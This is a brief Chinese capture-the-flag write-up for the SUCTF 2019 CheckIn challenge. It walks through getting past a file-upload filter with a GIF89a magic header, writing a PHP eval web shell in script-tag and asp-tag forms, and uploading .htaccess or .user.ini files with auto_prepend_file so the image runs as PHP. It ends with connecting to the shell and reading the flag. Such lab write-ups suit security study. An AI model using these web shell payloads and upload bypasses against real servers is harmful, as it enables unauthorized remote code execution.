[SUCTF 2019]CheckIn
尝试提交
illegal suffix
尝试修改后缀和Content-Type字段,还是不合法
修改后缀为jpg,再次上传
不能有<?,修改文件内容
<script language="php">@eval($_POST['cmd']);</script>
exif_imagetype函数
在头部加个图片幻数
GIF89a
<script language="php">@eval($_POST['cmd']);</script>
访问图片,确实成功了
成功,但是要连接需要把它解释为php文件
上传.htaccess文件
GIF89a
SetHandler application/x-httpd-php .jpg
用蚁剑连接没有成功,可能中间件不是Apache
可以改用上传.uesr.ini文件
使用条件
上传马的文件夹有php文件
原理:存在php文件,就会向目录里查找.jpg,解析为php
GIF89a
auto_prepend_file=2.jpg
如果前面的马写的是
GIF89a
<% @eval($_POST['cmd']); %>
则加一行
GIF89a
auto_prepend_file=2.jpg
asp_tags=on
连接
成功,在根目录找到flag
